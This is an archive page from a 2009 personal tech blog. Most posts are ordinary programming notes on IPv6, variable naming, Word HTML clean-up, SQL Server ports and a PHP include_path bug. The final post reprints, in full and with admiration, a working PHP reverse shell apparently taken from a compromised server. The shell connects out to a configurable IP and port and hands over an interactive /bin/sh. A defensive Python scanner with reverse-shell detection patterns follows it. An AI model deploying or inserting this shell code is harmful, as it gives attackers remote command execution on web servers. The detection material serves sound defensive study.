Archive for March, 2009

Starting The IP:v6::guide – IPv6 Knowledge

March 26th, 2009

As I firmly believe in the future of IPv6, and in the urgency with which we need to teach ourselves about it and implement its services, I started the IP:v6:guide blog.

In time, it should feature all common protocols used by IPv6 with detailed explanation (readable text on the bits & bytes, not just for those highly schooled robots, but for humans like you and me), as well as examples.

Right now, it briefly describes the following topics.

It also has a section for useful IPv6 links and IPv6 tools. Feel free to join in via the comments, and drop me a message when you see something wrong or have a request.

Matti | Tech

On The Subject Of Naming Variables

March 22nd, 2009

It happens to everyone. You’re typing hundreds or thousands of lines of code, and suddenly you find yourself stuck. You need to come up with a name for a new variable, and you can’t find one. It’s something so incredibly easy, yet you can’t think of a name for it.

That’s because deep down, you _know_ it’s not easy. You know this variable will come back to haunt you weeks later, when you’re maintaining the code and have forgotten what data it held. While nothing is as easy as naming all variables $a, $b, $c, … it just doesn’t cut it in the long term.

Let’s kick off with some examples of badly named variables. Don’t encode the current value in the name: the content of a variable may change, but its name usually doesn’t. Take the following CSS snippet.

.left_content_green {
	color: green;
	padding: 5px;
}

While this might seem like a good idea, it really isn’t. CSS is meant as a way to manage your site’s presentation in one central place, so changing styles is a piece of cake through a couple of CSS files. But naming your class “left_content_green” makes it horribly complicated to maintain once you decide to change its colour to red: you’re only supposed to change the rule in the CSS, not rename the class throughout your project. Now a class called “left_content_green” is turning your content red.

Be clear. While it may sound simple, clean and easy variable names apparently don’t come easily. Consider the following two pieces of code. Both perform the same action, yet one of them is remarkably easier to read and maintain.

while (!$notRunning) {
	// Do something, until completed
}
 
while ($running) {
	// Do something, until completed
}

The first while-loop can cause confusion. A double negative (“while not NotRunning, do this”) will add complexity where it’s not needed. The second loop, stating “while running, do this” is both easier to understand, and to write.

Keep your variable name, data type and content aligned. This mostly holds true for loosely typed languages such as PHP, where you can change the data type of a variable on the fly without complaint. Just don’t do this, for _whatever_ reason there might be (and I’ve seen it happen all too often).

// Start the script
$intStartingNumber = 5;
for ($i = 0; $i < $intStartingNumber; $i++) {
	echo $i;
}
 
// Add 15k+ lines of code ...
 
// Hey look, a variable $intStartingNumber that we haven't used in a while
$intStartingNumber = "five";
for ($j = 0; $j < 5; $j++) {
	echo $intStartingNumber;
}

If you don’t recognise the scenario above, consider yourself lucky. It’s a common mistake found in almost every PHP script. If you reuse a variable (which is fine – don’t get me wrong), make sure it is at least still named properly.

Matti | PHP

Word HTML: Get a Hint …

March 16th, 2009

Here’s one of Dreamweaver’s features: cleaning up the “HTML” (do mind the quotes!) that Microsoft Word generates when saving a document as a web page.

Clean up Word HTML

Its purpose is clear: transform the why-do-they-even-call-it-HTML code that Word generates into a manageable, W3C-compliant version. I suppose this result sums it all up.

Clean up Word HTML Results

In case you’ve never done this before: take a random Word document and save it as a .html file through the “Save as” menu in Word. Then look at the HTML source behind that page and see if you can decipher any proper HTML tags …

Its results are often noticed when copying and pasting Word text into an online text editor: the paste carries the underlying Word markup along with it (Office namespace tags, mso- styles, conditional comments), which often breaks the layout of the page.
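As an added illustration (this is neither Dreamweaver’s cleaner nor code from this post), here is a small Python cleaner that strips the Office-specific residue from a constructed sample of Word’s saved HTML, plus a check you can run on pasted content before it reaches a page. The sample markup and the list of tags and attributes it targets are assumptions about the typical shape of Word output, not a complete catalogue.

```python
import re

# Constructed sample of what Word emits for a short document when saved as a
# web page (assumption: this is the typical shape, trimmed; real output runs
# to hundreds of lines).
WORD_HTML = """<html xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]><xml><o:DocumentProperties/></xml><![endif]-->
<style>p.MsoNormal {mso-style-parent:""; margin:0cm;}</style>
</head>
<body lang=EN-US>
<p class=MsoNormal style='mso-margin-top-alt:auto;color:green'><span
style='font-family:"Calibri","sans-serif";mso-ascii-theme-font:minor-latin'>Hello,</span>
<b>world</b><o:p></o:p></p>
<p class=MsoNormal>Second paragraph.<o:p></o:p></p>
</body>
</html>"""


def clean_word_html(html: str) -> str:
    """Strip the Office-specific markup from Word's 'save as web page' output.

    Removes layout junk (conditional comments, Office XML islands, o:/v:/w:
    namespaced tags, Mso* classes, inline styles and the <style> block) while
    keeping structural tags such as <p> and <b>.
    """
    flags = re.S | re.I
    # <!--[if ...]> ... <![endif]--> blocks carrying Office-only markup
    html = re.sub(r"<!--\[if[^\]]*\]>.*?<!\[endif\]-->", "", html, flags=flags)
    # bare <xml>...</xml> islands that sit outside conditional comments
    html = re.sub(r"<xml>.*?</xml>", "", html, flags=flags)
    # namespaced Office tags: <o:p>, <v:shape>, <w:WordDocument>, ...
    html = re.sub(r"</?[ovw]:[^>]*>", "", html, flags=flags)
    # Word's page-specific stylesheet
    html = re.sub(r"<style[^>]*>.*?</style>", "", html, flags=flags)
    # inline style="..." / style='...' attributes (the mso-* rules live here)
    html = re.sub(r"\s+style\s*=\s*(\"[^\"]*\"|'[^']*')", "", html, flags=flags)
    # class=MsoNormal and friends, quoted or unquoted
    html = re.sub(r"\s+class\s*=\s*[\"']?Mso[^\s>\"']*[\"']?", "", html, flags=flags)
    # lang=EN-US attributes and xmlns:o="..." namespace declarations
    html = re.sub(r"\s+lang\s*=\s*[\"']?[A-Za-z-]+[\"']?", "", html, flags=flags)
    html = re.sub(r"\s+xmlns(:\w+)?\s*=\s*(\"[^\"]*\"|'[^']*')", "", html, flags=flags)
    # <span> wrappers exist only to carry styles; unwrap them
    html = re.sub(r"</?span\s*>", "", html, flags=flags)
    # collapse the leftover whitespace
    return re.sub(r"\s+", " ", html).strip()


def leaks_office_markup(html: str) -> bool:
    """Quick check for the tell-tale Word residue in pasted content."""
    return bool(re.search(r"mso-|<o:p|MsoNormal|<!--\[if", html, flags=re.I))


if __name__ == "__main__":
    print(leaks_office_markup(WORD_HTML))
    print(clean_word_html(WORD_HTML))
```

This is a layout clean-up, not a security sanitiser: it does not touch <script>, on* event handlers or javascript: URLs. If the pasted content comes from users, run it through an allow-list sanitiser such as HTML Purifier afterwards; stripping Word junk and neutralising hostile markup are two different jobs.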

Matti | Webdevelopment

Connect SQL Server Management Studio Express To Alternate TCP Port

March 11th, 2009

Since I didn’t find it right away, here’s the solution. The usual “server:port” notation doesn’t work here (for God knows what reason). You need to separate the hostname and port with a comma, as in “server,port”. The same comma convention applies to the -S parameter of sqlcmd and to the Server= key in ADO.NET connection strings. Here’s an example.

 

SQL Server Alternate Port

Whatever happened to the default point separation? :-(

Matti | Windows

‘php_admin_value’ Bug When Overwriting PHP Settings

March 7th, 2009

If you want to override certain settings for a particular directory, you can either use a .htaccess file or edit the Apache config file (php_admin_value is only accepted in the server configuration, not in .htaccess). One of those changes could be to alter PHP’s include_path for certain projects. Normally, you’d do this.

<Directory "/var/www/vhosts/xxx/httpdocs/">
        php_admin_value include_path "/var/www/<loc>/:/usr/share/pear/:/tmp/"
</Directory>

You might run into some unexpected results, where the include_path isn’t actually changed, and the files you’re trying to include aren’t being included.

Try changing it to this.

<Directory "/var/www/vhosts/xxx/httpdocs/">
        php_value include_path "/var/www/<loc>/:/usr/share/pear/:/tmp/"
</Directory>

There’s a known bug (#43677, marked resolved) that causes unexpected results when include_path is set through php_admin_value. A quick workaround is to change it to php_value. Release 5.2.6 fixed it permanently, but not every commercial hosting provider or control panel updates to the latest release right away. If you see strange behaviour with PEAR packages that aren’t being included despite a correctly set include_path, this might be the reason. One caveat with the workaround: php_admin_value locks a setting so that neither a .htaccess file nor ini_set() in a script can change it, while php_value leaves it open to both. For include_path that is usually acceptable, but don’t apply the same swap to settings you rely on for containment, such as open_basedir or disable_functions.

Matti | PHP

#tweetcoding: Coding Magic In 140 Chars

March 7th, 2009

This is definitely something worth checking out, #tweetcoding. Here’s the short description.

The idea was simple: See what people could code in 140 characters of AS3 [Action Script 3] (the number of characters in a single tweet). The results were unexpected: Hundreds of participants and entries, some of which are simply amazing.

And dear Lord, the results ARE amazing. I often couldn’t believe the magic that could be contained in a mere 140 characters of code. Granted, the scripts written don’t quite comply with the “basic rules” of coding, but that’s not the point. :-)

There aren’t many scripting/programming languages for which this could catch on, but ActionScript’s ability to output this kind of visualisation makes it a perfect test case.

Matti | programming

Reverse Shell Implementation in PHP5

March 3rd, 2009

Here’s a very interesting PHP script found on a compromised Linux box. I won’t discuss how it got there (using/abusing exploits is not in the scope of this post, and shouldn’t be discussed in comments either).

Credit goes to the original author.

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

And now for the script itself. Let the magic begin!

set_time_limit (0);
$VERSION = "1.0";
$ip = 'xxx.xxx.xxx.xxx';  // CHANGE THIS
$port = 8080;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
 
//
// Daemonise ourself if possible to avoid zombies later
//
 
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
 
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
 
	if ($pid) {
		exit(0);  // Parent exits
	}
 
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
 
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
 
// Change to a safe directory
chdir("/");
 
// Remove any umask we inherited
umask(0);
 
//
// Do the reverse shell...
//
 
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}
 
// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
 
$process = proc_open($shell, $descriptorspec, $pipes);
 
if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}
 
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
 
printit("Successfully opened reverse shell to $ip:$port");
 
while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
 
	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
 
	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 
	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
 
	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}
 
	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}
 
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
 
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // without this, $daemon would be an undefined local and the check would never fire
	if (!$daemon) {
		print "$string\n";
	}
}
 
?>

It shows an interesting use of process forking and of input/output stream handling. All credit goes to the original author; his details can be found in the script header and on his website.
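From the defender’s side, what the script needs in order to work is also what gives it away: an outbound TCP connection (fsockopen), a process spawn (proc_open), the interactive shell command line, and set_time_limit(0) so the request never times out. The following Python scanner is an added example, not part of the original post or of pentestmonkey’s tool; it scores PHP source against those indicators and also reports which process-spawning functions a php.ini’s disable_functions line leaves enabled. The PHP fragments and the php.ini fragment are constructed samples, and the weights and threshold are arbitrary choices for illustration.

```python
import re

# Constructed samples (not from any real incident): a fragment in the style of
# the script above, and a benign script that just fetches a web page.
SUSPECT_PHP = r"""<?php
set_time_limit (0);
$ip = '10.0.0.5';
$port = 8080;
$shell = 'uname -a; w; id; /bin/sh -i';
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$process = proc_open($shell, $descriptorspec, $pipes);
"""

BENIGN_PHP = r"""<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
fwrite($fp, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
"""

# Constructed php.ini fragment with a typical, but incomplete, lock-down.
SAMPLE_INI = """; php.ini (constructed)
memory_limit = 128M
disable_functions = exec,passthru,shell_exec,system
"""

# (name, regex, weight).  Opening a socket is normal for PHP; a socket plus a
# process spawn plus an interactive shell command line is the combination the
# reverse shell above depends on.
INDICATORS = [
    ("outbound_socket", r"\b(fsockopen|stream_socket_client|socket_create)\s*\(", 1),
    ("process_spawn", r"\b(proc_open|popen|exec|shell_exec|system|passthru)\s*\(", 2),
    ("interactive_shell", r"/bin/(ba)?sh\s+-i\b", 3),
    ("daemonise", r"\b(pcntl_fork|posix_setsid)\s*\(", 2),
    ("no_time_limit", r"\bset_time_limit\s*\(\s*0\s*\)", 1),
]

SPAWN_FUNCTIONS = ["proc_open", "popen", "exec", "shell_exec", "system",
                   "passthru", "pcntl_fork"]


def score_php_source(src: str):
    """Return (score, matched indicator names) for one PHP source text."""
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, src)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def is_reverse_shell(src: str, threshold: int = 5) -> bool:
    """Heuristic verdict: needs an outbound socket plus enough other indicators."""
    score, hits = score_php_source(src)
    return "outbound_socket" in hits and score >= threshold


def unblocked_spawn_functions(ini_text: str):
    """Which process-spawning functions does this php.ini still allow?"""
    match = re.search(r"^\s*disable_functions\s*=\s*(.*)$", ini_text, flags=re.M)
    disabled = set()
    if match:
        disabled = {f.strip() for f in match.group(1).split(",") if f.strip()}
    return [f for f in SPAWN_FUNCTIONS if f not in disabled]


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PHP), ("benign", BENIGN_PHP)):
        print(label, score_php_source(src), is_reverse_shell(src))
    print("still enabled:", unblocked_spawn_functions(SAMPLE_INI))
```

Note that a disable_functions list of exec, passthru, shell_exec and system does nothing against this script, which uses proc_open; the ini check exists precisely to surface that gap. Egress filtering on the web server (blocking outbound connections the application doesn’t need) defeats the reverse connection regardless of which PHP function opened it.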

Matti | PHP